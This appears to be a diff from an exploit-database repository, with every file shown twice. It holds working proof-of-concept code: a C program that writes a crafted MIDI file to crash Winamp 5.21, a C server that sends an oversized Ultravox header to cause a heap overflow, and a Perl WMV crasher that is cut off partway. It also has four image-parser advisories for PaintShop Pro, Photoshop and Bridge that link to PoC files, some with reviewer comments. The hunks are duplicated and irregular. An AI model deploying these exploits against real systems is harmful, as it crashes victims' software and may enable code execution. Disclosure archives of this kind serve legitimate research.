@ -1,68 +1,68 @@
/*
* ********************************************** *
* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *
* ********************************************** *
* PoC coded by: BassReFLeX *
* Date: 19 Jun 2006 *
* ********************************************** *
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void usage(char* file);
char header[] = "\x4D\x54\x68\x64\x00\x00"
"\x00\x06\x00\x00\x00\x01"
"\x00\x60\x4D\x54\x72\x6B"
"\x00\x00";
char badc0de[] = "\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF";
int main(int argc,char* argv[])
{
system("cls");
printf("\n* ********************************************** *");
printf("\n* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *");
printf("\n* ********************************************** *");
printf("\n* PoC coded by: BassReFLeX *");
printf("\n* Date: 19 Jun 2006 *");
printf("\n* ********************************************** *");
if ( argc!=2 )
{
usage(argv[0]);
}
FILE *f;
f = fopen(argv[1],"w");
if ( !f )
{
printf("\nFile couldn't open!");
exit(1);
}
printf("\n\nWriting crafted .mid file...");
fwrite(header,1,sizeof(header),f);
fwrite(badc0de,1,sizeof(badc0de),f);
printf("\nFile created successfully!");
printf("\nFile: %s",argv[1]);
return 0;
}
void usage(char* file)
{
printf("\n\n");
printf("\n%s <Filename>",file);
printf("\n\nFilename = .mid crafted file. Example: winsploit.exe craftedsh1t.mid");
exit(1);
}
// milw0rm.com [2006-06-20]
/*
* ********************************************** *
* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *
* ********************************************** *
* PoC coded by: BassReFLeX *
* Date: 19 Jun 2006 *
* ********************************************** *
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void usage(char* file);
char header[] = "\x4D\x54\x68\x64\x00\x00"
"\x00\x06\x00\x00\x00\x01"
"\x00\x60\x4D\x54\x72\x6B"
"\x00\x00";
char badc0de[] = "\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF";
int main(int argc,char* argv[])
{
system("cls");
printf("\n* ********************************************** *");
printf("\n* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *");
printf("\n* ********************************************** *");
printf("\n* PoC coded by: BassReFLeX *");
printf("\n* Date: 19 Jun 2006 *");
printf("\n* ********************************************** *");
if ( argc!=2 )
{
usage(argv[0]);
}
FILE *f;
f = fopen(argv[1],"w");
if ( !f )
{
printf("\nFile couldn't open!");
exit(1);
}
printf("\n\nWriting crafted .mid file...");
fwrite(header,1,sizeof(header),f);
fwrite(badc0de,1,sizeof(badc0de),f);
printf("\nFile created successfully!");
printf("\nFile: %s",argv[1]);
return 0;
}
void usage(char* file)
{
printf("\n\n");
printf("\n%s <Filename>",file);
printf("\n\nFilename = .mid crafted file. Example: winsploit.exe craftedsh1t.mid");
exit(1);
}
// milw0rm.com [2006-06-20]


@ -1,217 +1,217 @@
/************************************************************************************
Nullsoft Winamp < 5.31 Ultravox "Ultravox-Max-Msg" Heap Overflow Dos POC
by cocoruder(frankruder_at_hotmail.com),2006/10/30
use like "winamp_unsv.exe ultravox-max-msg_value",then the winamp_unsv(simple ultravox
server) will listen on tcp port 80,when winamp connect the server via ultravox protocol
usage example:
winamp_unsv.exe 500000000
winamp_unsv.exe 2147481601
**************************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock.h>
#define SERVER_PORT 80
unsigned char buff1_header1[]=
"HTTP/1.0 200 OK\x0D\x0A"
"Server: Ultravox 3.0\x0D\x0A"
"Content-Type: misc/ultravox\x0D\x0A"
"Ultravox-SID: 13381\x0D\x0A"
"Ultravox-Avg-Bitrate: 16000\x0D\x0A"
"Ultravox-Max-Bitrate: 24000\x0D\x0A"
"Ultravox-Max-Msg: ";
unsigned char buff1_header2[]=
"\x0D\x0A"
"Ultravox-Stream-Info: Ultravox;Live Stream\x0D\x0A"
"Ultravox-Msg-Que: 42\x0D\x0A"
"Ultravox-Max-Fragments: 1\x0D\x0A\x0D\x0A";
//4294965247
//1073739776
//1073739775
//1000000000
// 500000000
// 50000000
unsigned char buff2[]=
"\x5a\x00"
"\x39\x01\x01\xe0\x00\x01\x00\x01\x00\x01\x3c\x6d\x65\x74\x61\x64"
"\x61\x74\x61\x3e\x3c\x6c\x65\x6e\x67\x74\x68\x3e\x30\x3c\x2f\x6c"
"\x65\x6e\x67\x74\x68\x3e\x3c\x73\x6f\x6f\x6e\x3e\x4d\x6f\x72\x65"
"\x20\x6f\x6e\x20\x54\x48\x45\x20\x35\x30\x73\x3c\x2f\x73\x6f\x6f"
"\x6e\x3e\x3c\x73\x6f\x6e\x67\x3e\x3c\x6e\x61\x6d\x65\x3e\x54\x69"
"\x6e\x61\x20\x4d\x61\x72\x69\x65\x20\x28\x31\x39\x35\x35\x29\x3c"
"\x2f\x6e\x61\x6d\x65\x3e\x3c\x61\x6c\x62\x75\x6d\x3e\x47\x72\x65"
"\x61\x74\x65\x73\x74\x20\x48\x69\x74\x73\x3c\x2f\x61\x6c\x62\x75"
"\x6d\x3e\x3c\x61\x72\x74\x69\x73\x74\x3e\x50\x65\x72\x72\x79\x20"
"\x43\x6f\x6d\x6f\x20\x6f\x26\x23\x34\x37\x3b\x4d\x69\x74\x63\x68"
"\x65\x6c\x6c\x20\x41\x79\x72\x65\x73\x3c\x2f\x61\x72\x74\x69\x73"
"\x74\x3e\x3c\x61\x6c\x62\x75\x6d\x5f\x61\x72\x74\x3e\x78\x6d\x2f"
"\x73\x74\x61\x74\x69\x6f\x6e\x5f\x6c\x6f\x67\x6f\x5f\x35\x2e\x6a"
"\x70\x67\x3c\x2f\x61\x6c\x62\x75\x6d\x5f\x61\x72\x74\x3e\x3c\x73"
"\x65\x72\x69\x61\x6c\x3e\x2d\x31\x3c\x2f\x73\x65\x72\x69\x61\x6c"
"\x3e\x3c\x73\x6f\x6e\x67\x5f\x69\x64\x3e\x2d\x31\x3c\x2f\x73\x6f"
"\x6e\x67\x5f\x69\x64\x3e\x3c\x61\x6d\x67\x5f\x73\x6f\x6e\x67\x5f"
"\x69\x64\x3e\x2d\x31\x3c\x2f\x61\x6d\x67\x5f\x73\x6f\x6e\x67\x5f"
"\x69\x64\x3e\x3c\x61\x6d\x67\x5f\x61\x72\x74\x69\x73\x74\x5f\x69"
"\x64\x3e\x2d\x31\x3c\x2f\x61\x6d\x67\x5f\x61\x72\x74\x69\x73\x74"
"\x5f\x69\x64\x3e\x3c\x61\x6d\x67\x5f\x61\x6c\x62\x75\x6d\x5f\x69"
"\x64\x3e\x2d\x31\x3c\x2f\x61\x6d\x67\x5f\x61\x6c\x62\x75\x6d\x5f"
"\x69\x64\x3e\x3c\x69\x74\x75\x6e\x65\x73\x5f\x73\x6f\x6e\x67\x5f"
"\x69\x64\x3e\x2d\x31\x3c\x2f\x69\x74\x75\x6e\x65\x73\x5f\x73\x6f"
"\x6e\x67\x5f\x69\x64\x3e\x3c\x69\x74\x75\x6e\x65\x73\x5f\x61\x72"
"\x74\x69\x73\x74\x5f\x69\x64\x3e\x2d\x31\x3c\x2f\x69\x74\x75\x6e"
"\x65\x73\x5f\x61\x72\x74\x69\x73\x74\x5f\x69\x64\x3e\x3c\x69\x74"
"\x75\x6e\x65\x73\x5f\x61\x6c\x62\x75\x6d\x5f\x69\x64\x3e\x2d\x31"
"\x3c\x2f\x69\x74\x75\x6e\x65\x73\x5f\x61\x6c\x62\x75\x6d\x5f\x69"
"\x64\x3e\x3c\x2f\x73\x6f\x6e\x67\x3e\x3c\x2f\x6d\x65\x74\x61\x64"
"\x61\x74\x61\x3e\x00\x5a\x00\x80\x03\x03\x67\xff\xf9\x5c\x40\x0b"
"\xc1\x5c\x01\x62\x31\xa5\xe3\x40\x0e\x92\xda\x57\x42\x9c\xfa\x68"
"\xd3\xb3\xdb\x4b\x69\x89\x04\x00\x00\x2b\x8c\xbb\x5f\x92\xf3\x34"
"\x5a\x91\x5b\x43\xb0\xe1\x9b\x2f\x26\x66\x32\x67\x45\x59\x1e\x3c"
"\x68\x87\xfd\x97\x96\xa5\x75\x18\x0a\x27\x04\x0f\x09\xeb\x20\xb4"
"\x92\x0e\x18\xc5\xbc\xc8\xf8\xa6\x51\x12\x29\xe0\xf9\x81\x1b\xa6";
int main (int argc, char *argv[])
{
int i, num=1, rc, on = 1;
int listen_sd, accept_sd;
char buffer[80];
struct sockaddr_in addr;
WSADATA wsadata;
unsigned char *lpbuff;
DWORD bufflen;
int aa=-0x1000;
WSAStartup(MAKEWORD(2,2),&wsadata);
listen_sd = socket(AF_INET, SOCK_STREAM, 0);
if (listen_sd < 0)
{
perror("socket() failed");
exit(-1);
}
rc = setsockopt(listen_sd,
SOL_SOCKET, SO_REUSEADDR,
(char *)&on, sizeof(on));
if (rc < 0)
{
perror("setsockopt() failed");
closesocket(listen_sd);
exit(-1);
}
//Bind the socket
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = htonl(INADDR_ANY);
addr.sin_port = htons(SERVER_PORT);
rc = bind(listen_sd,
(struct sockaddr *)&addr, sizeof(addr));
if (rc < 0)
{
perror("bind() failed");
closesocket(listen_sd);
exit(-1);
}
rc = listen(listen_sd, 5);
if (rc < 0)
{
perror("listen() failed");
closesocket(listen_sd);
exit(-1);
}
printf("The server is ready\n");
bufflen=sizeof(buff1_header1)-1+strlen(argv[1])+sizeof(buff1_header2)-1;
lpbuff=(unsigned char *)malloc(bufflen);
if (lpbuff==NULL)
{
printf("malloc error!\n");
return -1;
}
memset(lpbuff,0,bufflen);
strcat((char *)lpbuff,(char *)buff1_header1);
strcat((char *)lpbuff,(char *)argv[1]);
strcat((char *)lpbuff,(char *)buff1_header2);
for (i=0; i < num; i++)
{
printf("Interation: %d\n", i+1);
printf(" waiting on accept()\n");
accept_sd = accept(listen_sd, NULL, NULL);
if (accept_sd < 0)
{
perror("accept() failed");
closesocket(listen_sd);
exit(-1);
}
printf(" accept completed successfully\n");
printf(" wait for client to send us a message\n");
rc = recv(accept_sd, buffer, sizeof(buffer), 0);
if (rc <= 0)
{
perror("recv() failed");
closesocket(listen_sd);
closesocket(accept_sd);
exit(-1);
}
printf(" <%s>\n", buffer);
rc= send(accept_sd,(char *)lpbuff,bufflen,0);
if (rc>0)
{
printf("send ultravox header OK!\n");
}
rc=send(accept_sd,(char *)buff2,sizeof(buff2)-1,0);
if (rc>0)
{
printf("send ultravox first stream OK!\n");
}
while (1)
{
Sleep(1000);
}
}
closesocket(listen_sd);
return 0;
}
// milw0rm.com [2006-11-03]
/************************************************************************************
Nullsoft Winamp < 5.31 Ultravox "Ultravox-Max-Msg" Heap Overflow Dos POC
by cocoruder(frankruder_at_hotmail.com),2006/10/30
use like "winamp_unsv.exe ultravox-max-msg_value",then the winamp_unsv(simple ultravox
server) will listen on tcp port 80,when winamp connect the server via ultravox protocol
usage example:
winamp_unsv.exe 500000000
winamp_unsv.exe 2147481601
**************************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock.h>
#define SERVER_PORT 80
unsigned char buff1_header1[]=
"HTTP/1.0 200 OK\x0D\x0A"
"Server: Ultravox 3.0\x0D\x0A"
"Content-Type: misc/ultravox\x0D\x0A"
"Ultravox-SID: 13381\x0D\x0A"
"Ultravox-Avg-Bitrate: 16000\x0D\x0A"
"Ultravox-Max-Bitrate: 24000\x0D\x0A"
"Ultravox-Max-Msg: ";
unsigned char buff1_header2[]=
"\x0D\x0A"
"Ultravox-Stream-Info: Ultravox;Live Stream\x0D\x0A"
"Ultravox-Msg-Que: 42\x0D\x0A"
"Ultravox-Max-Fragments: 1\x0D\x0A\x0D\x0A";
//4294965247
//1073739776
//1073739775
//1000000000
// 500000000
// 50000000
unsigned char buff2[]=
"\x5a\x00"
"\x39\x01\x01\xe0\x00\x01\x00\x01\x00\x01\x3c\x6d\x65\x74\x61\x64"
"\x61\x74\x61\x3e\x3c\x6c\x65\x6e\x67\x74\x68\x3e\x30\x3c\x2f\x6c"
"\x65\x6e\x67\x74\x68\x3e\x3c\x73\x6f\x6f\x6e\x3e\x4d\x6f\x72\x65"
"\x20\x6f\x6e\x20\x54\x48\x45\x20\x35\x30\x73\x3c\x2f\x73\x6f\x6f"
"\x6e\x3e\x3c\x73\x6f\x6e\x67\x3e\x3c\x6e\x61\x6d\x65\x3e\x54\x69"
"\x6e\x61\x20\x4d\x61\x72\x69\x65\x20\x28\x31\x39\x35\x35\x29\x3c"
"\x2f\x6e\x61\x6d\x65\x3e\x3c\x61\x6c\x62\x75\x6d\x3e\x47\x72\x65"
"\x61\x74\x65\x73\x74\x20\x48\x69\x74\x73\x3c\x2f\x61\x6c\x62\x75"
"\x6d\x3e\x3c\x61\x72\x74\x69\x73\x74\x3e\x50\x65\x72\x72\x79\x20"
"\x43\x6f\x6d\x6f\x20\x6f\x26\x23\x34\x37\x3b\x4d\x69\x74\x63\x68"
"\x65\x6c\x6c\x20\x41\x79\x72\x65\x73\x3c\x2f\x61\x72\x74\x69\x73"
"\x74\x3e\x3c\x61\x6c\x62\x75\x6d\x5f\x61\x72\x74\x3e\x78\x6d\x2f"
"\x73\x74\x61\x74\x69\x6f\x6e\x5f\x6c\x6f\x67\x6f\x5f\x35\x2e\x6a"
"\x70\x67\x3c\x2f\x61\x6c\x62\x75\x6d\x5f\x61\x72\x74\x3e\x3c\x73"
"\x65\x72\x69\x61\x6c\x3e\x2d\x31\x3c\x2f\x73\x65\x72\x69\x61\x6c"
"\x3e\x3c\x73\x6f\x6e\x67\x5f\x69\x64\x3e\x2d\x31\x3c\x2f\x73\x6f"
"\x6e\x67\x5f\x69\x64\x3e\x3c\x61\x6d\x67\x5f\x73\x6f\x6e\x67\x5f"
"\x69\x64\x3e\x2d\x31\x3c\x2f\x61\x6d\x67\x5f\x73\x6f\x6e\x67\x5f"
"\x69\x64\x3e\x3c\x61\x6d\x67\x5f\x61\x72\x74\x69\x73\x74\x5f\x69"
"\x64\x3e\x2d\x31\x3c\x2f\x61\x6d\x67\x5f\x61\x72\x74\x69\x73\x74"
"\x5f\x69\x64\x3e\x3c\x61\x6d\x67\x5f\x61\x6c\x62\x75\x6d\x5f\x69"
"\x64\x3e\x2d\x31\x3c\x2f\x61\x6d\x67\x5f\x61\x6c\x62\x75\x6d\x5f"
"\x69\x64\x3e\x3c\x69\x74\x75\x6e\x65\x73\x5f\x73\x6f\x6e\x67\x5f"
"\x69\x64\x3e\x2d\x31\x3c\x2f\x69\x74\x75\x6e\x65\x73\x5f\x73\x6f"
"\x6e\x67\x5f\x69\x64\x3e\x3c\x69\x74\x75\x6e\x65\x73\x5f\x61\x72"
"\x74\x69\x73\x74\x5f\x69\x64\x3e\x2d\x31\x3c\x2f\x69\x74\x75\x6e"
"\x65\x73\x5f\x61\x72\x74\x69\x73\x74\x5f\x69\x64\x3e\x3c\x69\x74"
"\x75\x6e\x65\x73\x5f\x61\x6c\x62\x75\x6d\x5f\x69\x64\x3e\x2d\x31"
"\x3c\x2f\x69\x74\x75\x6e\x65\x73\x5f\x61\x6c\x62\x75\x6d\x5f\x69"
"\x64\x3e\x3c\x2f\x73\x6f\x6e\x67\x3e\x3c\x2f\x6d\x65\x74\x61\x64"
"\x61\x74\x61\x3e\x00\x5a\x00\x80\x03\x03\x67\xff\xf9\x5c\x40\x0b"
"\xc1\x5c\x01\x62\x31\xa5\xe3\x40\x0e\x92\xda\x57\x42\x9c\xfa\x68"
"\xd3\xb3\xdb\x4b\x69\x89\x04\x00\x00\x2b\x8c\xbb\x5f\x92\xf3\x34"
"\x5a\x91\x5b\x43\xb0\xe1\x9b\x2f\x26\x66\x32\x67\x45\x59\x1e\x3c"
"\x68\x87\xfd\x97\x96\xa5\x75\x18\x0a\x27\x04\x0f\x09\xeb\x20\xb4"
"\x92\x0e\x18\xc5\xbc\xc8\xf8\xa6\x51\x12\x29\xe0\xf9\x81\x1b\xa6";
int main (int argc, char *argv[])
{
int i, num=1, rc, on = 1;
int listen_sd, accept_sd;
char buffer[80];
struct sockaddr_in addr;
WSADATA wsadata;
unsigned char *lpbuff;
DWORD bufflen;
int aa=-0x1000;
WSAStartup(MAKEWORD(2,2),&wsadata);
listen_sd = socket(AF_INET, SOCK_STREAM, 0);
if (listen_sd < 0)
{
perror("socket() failed");
exit(-1);
}
rc = setsockopt(listen_sd,
SOL_SOCKET, SO_REUSEADDR,
(char *)&on, sizeof(on));
if (rc < 0)
{
perror("setsockopt() failed");
closesocket(listen_sd);
exit(-1);
}
//Bind the socket
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = htonl(INADDR_ANY);
addr.sin_port = htons(SERVER_PORT);
rc = bind(listen_sd,
(struct sockaddr *)&addr, sizeof(addr));
if (rc < 0)
{
perror("bind() failed");
closesocket(listen_sd);
exit(-1);
}
rc = listen(listen_sd, 5);
if (rc < 0)
{
perror("listen() failed");
closesocket(listen_sd);
exit(-1);
}
printf("The server is ready\n");
bufflen=sizeof(buff1_header1)-1+strlen(argv[1])+sizeof(buff1_header2)-1;
lpbuff=(unsigned char *)malloc(bufflen);
if (lpbuff==NULL)
{
printf("malloc error!\n");
return -1;
}
memset(lpbuff,0,bufflen);
strcat((char *)lpbuff,(char *)buff1_header1);
strcat((char *)lpbuff,(char *)argv[1]);
strcat((char *)lpbuff,(char *)buff1_header2);
for (i=0; i < num; i++)
{
printf("Interation: %d\n", i+1);
printf(" waiting on accept()\n");
accept_sd = accept(listen_sd, NULL, NULL);
if (accept_sd < 0)
{
perror("accept() failed");
closesocket(listen_sd);
exit(-1);
}
printf(" accept completed successfully\n");
printf(" wait for client to send us a message\n");
rc = recv(accept_sd, buffer, sizeof(buffer), 0);
if (rc <= 0)
{
perror("recv() failed");
closesocket(listen_sd);
closesocket(accept_sd);
exit(-1);
}
printf(" <%s>\n", buffer);
rc= send(accept_sd,(char *)lpbuff,bufflen,0);
if (rc>0)
{
printf("send ultravox header OK!\n");
}
rc=send(accept_sd,(char *)buff2,sizeof(buff2)-1,0);
if (rc>0)
{
printf("send ultravox first stream OK!\n");
}
while (1)
{
Sleep(1000);
}
}
closesocket(listen_sd);
return 0;
}
// milw0rm.com [2006-11-03]

74
platforms/windows/dos/37346.txt Executable file

@ -0,0 +1,74 @@
#####################################################################################
Application: Paintshop Pro X7 GIF Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)
Platforms: Windows
Versions: The vulnerability is confirmed in version Paintshop Prox X7, Other versions may also be affected.
Secunia:
{PRL}: 2015-06
Author: Francis Provencher (Protek Research Labs)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
PaintShop Pro (PSP) is a raster and vector graphics editor for Microsoft Windows. It was originally published by Jasc Software. In October 2004, Corel purchased Jasc Software and the distribution rights to Paint Shop Pro. PSP functionality can be extended by Photoshop-compatible plugins.
Although often written as Paint Shop Pro, Corels website shows the name for the product as PaintShop Pro. The X-numbered editions have been sold in two versions: PaintShop Pro, which is the basic editing program, and PaintShop Pro Ultimate, which bundles in other standalone programs. The particular bundled programs have varied with each numbered version and have not been sold by Corel as separate products.
(https://en.wikipedia.org/wiki/PaintShop_Pro)
#####################################################################################
============================
2) Report Timeline
============================
2015-04-23: Francis Provencher from Protek Research Labs found the issue;
2015-02-24: Francis Provencher From Protek Research Labs ask for a security contact at Corel Software;
2015-02-25: Francis Provencher From Protek Research Labs ask for a security contact at Corel Software;
2015-05-10: Corel push a silent fix, without credit.
2015-05-16: Publication of this advisory.
#####################################################################################
============================
3) Technical details
============================
An error when handling LZWMinimumCodeSize can be exploited to cause an heap memory corruption via a specially crafted GIF file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/PRL-2015-06.gif
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37346.gif
###############################################################################
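Review bot: The report timeline is internally inconsistent: the issue is dated as found on 2015-04-23, yet the two vendor-contact attempts are dated 2015-02-24 and 2015-02-25, two months earlier, so one of these dates is presumably a typo and the disclosure window cannot be read from the file as written. The `Secunia:` field is left empty and the Versions line has a typo (`Paintshop Prox X7`). Since the PoC is only two links to a binary GIF, adding a digest line such as `SHA-256: <hash of PRL-2015-06.gif>` would let a tester confirm the mirrored sample matches the one the advisory was written against.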

74
platforms/windows/dos/37347.txt Executable file

@ -0,0 +1,74 @@
#####################################################################################
Application: Adobe Photoshop CC 2014 & Bridge CC 2014
Platforms: Windows
Versions: The vulnerability is confirmed in version Photoshop CC 2014 and Bridge CC 2014.
Secunia:
{PRL}: 2015-07
Author: Francis Provencher (Protek Research Labs)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Photoshop is a raster graphics editor developed and published by Adobe Systems for Windows and OS X.
Photoshop was created in 1988 by Thomas and John Knoll. Since then, it has become the de facto industry standard in raster graphics editing, such that the word “photoshop” has become a verb as in “to photoshop an image,” “photoshopping,” and “photoshop contest,” etc. It can edit and compose raster images in multiple layers and supports masks, alpha compositing and several colour models including RGB,CMYK, Lab colour space (with capital L), spot colour and duotone. Photoshop has vast support for graphic file formats but also uses its own PSD and PSB file formats which support all the aforementioned features. In addition to raster graphics, it has limited abilities to edit or render text, vector graphics (especially through clipping path), 3D graphics and video. Photoshops featureset can be expanded by Photoshop plug-ins, programs developed and distributed independently of Photoshop that can run inside it and offer new or enhanced features.
(https://en.wikipedia.org/wiki/Adobe_Photoshop)
#####################################################################################
============================
2) Report Timeline
============================
2015-03-15: Francis Provencher from Protek Research Labs found the issue;
2015-03-19: Francis Provencher From Protek Research Labs report vulnerability to PSIRT;
2015-05-16: Adobe release a patch (APSB15-12)
#####################################################################################
============================
3) Technical details
============================
An error in the the GIF parser, could lead to a memory corruption when processing a crafted GIF image with an invalid value in the “ImageLeftPosition” into
the “ImageDescriptor”.
Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires
tricking a user into opening or previewing a malicious file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/PRL-2015-07.gif
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37347.gif
###############################################################################
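Review bot: The advisory gives a defender nothing to pivot on — the `Secunia:` field is left empty and no CVE or fixed build number appears, only the bulletin reference in `2015-05-16: Adobe release a patch (APSB15-12)` — so the entry cannot be matched against the bulletin's fix list or used to tell a patched install from an unpatched one. The text also claims "execution of arbitrary code" while the file is filed under dos, and nothing in the advisory (no crash context, no control of a pointer) supports more than the memory-corruption/DoS classification; I would either keep the wording to what the PoC demonstrates or add the evidence. The PoC itself is an external binary (PRL-2015-07.gif, mirrored as 37347.gif), so whether the mirrored file matches the "ImageLeftPosition" description cannot be checked from the text alone. Finally the file is added with the executable bit set (`Executable file`) although it is plain text; I would add a `CVE:` / `Fixed in:` line under `Secunia:` once known and drop the executable bit.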

71
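--- /dev/null
+++ b/platforms/windows/dos/37348.txt
@@ -0,0 +1,71 @@
+#####################################################################################
+Application: Adobe Photoshop CC 2014 & Bridge CC 2014
+Platforms: Windows
+Versions: The vulnerability is confirmed in version Photoshop CC 2014 and Bridge CC 2014.
+Secunia:
+{PRL}: 2015-08
+Author: Francis Provencher (Protek Research Labs)
+Website: http://www.protekresearchlab.com/
+Twitter: @ProtekResearch
+#####################################################################################
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+#####################################################################################
+===============
+1) Introduction
+===============
+Adobe Photoshop is a raster graphics editor developed and published by Adobe Systems for Windows and OS X.
+Photoshop was created in 1988 by Thomas and John Knoll. Since then, it has become the de facto industry standard in raster graphics editing, such that the word “photoshop” has become a verb as in “to photoshop an image,” “photoshopping,” and “photoshop contest,” etc. It can edit and compose raster images in multiple layers and supports masks, alpha compositing and several colour models including RGB,CMYK, Lab colour space (with capital L), spot colour and duotone. Photoshop has vast support for graphic file formats but also uses its own PSD and PSB file formats which support all the aforementioned features. In addition to raster graphics, it has limited abilities to edit or render text, vector graphics (especially through clipping path), 3D graphics and video. Photoshops featureset can be expanded by Photoshop plug-ins, programs developed and distributed independently of Photoshop that can run inside it and offer new or enhanced features.
+(https://en.wikipedia.org/wiki/Adobe_Photoshop)
+#####################################################################################
+============================
+2) Report Timeline
+============================
+2015-03-15: Francis Provencher from Protek Research Labs found the issue;
+2015-03-19: Francis Provencher From Protek Research Labs report vulnerability to PSIRT;
+2015-05-16: Adobe release a patch (APSB15-12)
+#####################################################################################
+============================
+3) Technical details
+============================
+An error in the the PNG parser, could lead to a memory corruption when processing a crafted PNG image with an oversize value in the “Length” into the “CHUNK” Structure.
+Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires
+tricking a user into opening or previewing a malicious file.
+#####################################################################################
+===========
+4) POC
+===========
+http://protekresearchlab.com/exploits/PRL-2015-08.png
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37348.png
+###############################################################################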

71
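--- /dev/null
+++ b/platforms/windows/dos/37349.txt
@@ -0,0 +1,71 @@
+#####################################################################################
+Application: Adobe Photoshop CC 2014 & Bridge CC 2014
+Platforms: Windows
+Versions: The vulnerability is confirmed in version Photoshop CC 2014 and Bridge CC 2014.
+Secunia:
+{PRL}: 2015-08
+Author: Francis Provencher (Protek Research Labs)
+Website: http://www.protekresearchlab.com/
+Twitter: @ProtekResearch
+#####################################################################################
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+#####################################################################################
+===============
+1) Introduction
+===============
+Adobe Photoshop is a raster graphics editor developed and published by Adobe Systems for Windows and OS X.
+Photoshop was created in 1988 by Thomas and John Knoll. Since then, it has become the de facto industry standard in raster graphics editing, such that the word “photoshop” has become a verb as in “to photoshop an image,” “photoshopping,” and “photoshop contest,” etc. It can edit and compose raster images in multiple layers and supports masks, alpha compositing and several colour models including RGB,CMYK, Lab colour space (with capital L), spot colour and duotone. Photoshop has vast support for graphic file formats but also uses its own PSD and PSB file formats which support all the aforementioned features. In addition to raster graphics, it has limited abilities to edit or render text, vector graphics (especially through clipping path), 3D graphics and video. Photoshops featureset can be expanded by Photoshop plug-ins, programs developed and distributed independently of Photoshop that can run inside it and offer new or enhanced features.
+(https://en.wikipedia.org/wiki/Adobe_Photoshop)
+#####################################################################################
+============================
+2) Report Timeline
+============================
+2015-03-15: Francis Provencher from Protek Research Labs found the issue;
+2015-03-19: Francis Provencher From Protek Research Labs report vulnerability to PSIRT;
+2015-05-16: Adobe release a patch (APSB15-12)
+#####################################################################################
+============================
+3) Technical details
+============================
+An error in the the PNG parser, could lead to a memory corruption when processing a crafted PNG image with an oversize value in the “Length” into the “CHUNK” Structure.
+Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires
+tricking a user into opening or previewing a malicious file.
+#####################################################################################
+===========
+4) POC
+===========
+http://protekresearchlab.com/exploits/PRL-2015-08.png
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37349.png
+###############################################################################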
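Review bot: 37349.txt is the same advisory as 37348.txt — same `{PRL}: 2015-08`, same PNG `“Length”`/`“CHUNK”` description, same timeline and the same upstream PoC URL `http://protekresearchlab.com/exploits/PRL-2015-08.png`; only the mirror line differs (`.../sploits/37349.png` vs `37348.png`). Two EDB ids carrying one advisory looks like a mis-filed entry: the sequence 2015-06, 2015-07, 2015-08 in this commit suggests this file was probably meant to hold a different PRL advisory, but that cannot be confirmed from the text. Before this is indexed I would check whether the mirrored 37349.png binary actually differs from 37348.png and, if it does, replace this text with the advisory that describes it; if it does not, mark 37349 as a duplicate of 37348 rather than publishing it as a separate issue. As committed the file also carries the executable bit (`Executable file`) for a plain-text advisory.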


@ -1,65 +1,65 @@
#!/usr/bin/perl
# --------------------------------- Winamp <= (WMV) 5.3 Buffer Overflow DOS Exploit (0-DAY) ---------------------------------
# Type :
# Buffer Overflow - DOS
# Release Date :
# {2007-04-16}
# Product / Vendor :
# Winamp Media Player
# http://www.winamp.com/
# Exploit :
#############################################
#Exploit Coded By UNIQUE-KEY[UNIQUE-CRACKER]#
#############################################
{
print "\n-----------------------------------\n";
print "Winamp <= (WMV) 5.3 Buffer Overflow DOS Exploit (0-DAY)\n";
print "-----------------------------------\n";
print "\nUniquE-Key{UniquE-Cracker}\n";
print "UniquE[at]UniquE-Key.ORG\n";
print "http://UniquE-Key.ORG\n";
print "\n-----------------------------------\n";
print "\nExploit Completed!\n";
print "\n-----------------------------------\n";
}
open(wmv, ">./exploit.wmv");
print wmv "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00".
print wmv "\x4D\x54\x68\x64";
close(wmv);
# Tested :
# --- WINAMP 5.3 Version ---
# Author :
# UniquE-Key{UniquE-Cracker}
# UniquE(at)UniquE-Key.Org
# http://www.UniquE-Key.Org
# milw0rm.com [2007-04-19]
#!/usr/bin/perl
# --------------------------------- Winamp <= (WMV) 5.3 Buffer Overflow DOS Exploit (0-DAY) ---------------------------------
# Type :
# Buffer Overflow - DOS
# Release Date :
# {2007-04-16}
# Product / Vendor :
# Winamp Media Player
# http://www.winamp.com/
# Exploit :
#############################################
#Exploit Coded By UNIQUE-KEY[UNIQUE-CRACKER]#
#############################################
{
print "\n-----------------------------------\n";
print "Winamp <= (WMV) 5.3 Buffer Overflow DOS Exploit (0-DAY)\n";
print "-----------------------------------\n";
print "\nUniquE-Key{UniquE-Cracker}\n";
print "UniquE[at]UniquE-Key.ORG\n";
print "http://UniquE-Key.ORG\n";
print "\n-----------------------------------\n";
print "\nExploit Completed!\n";
print "\n-----------------------------------\n";
}
open(wmv, ">./exploit.wmv");
print wmv "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00".
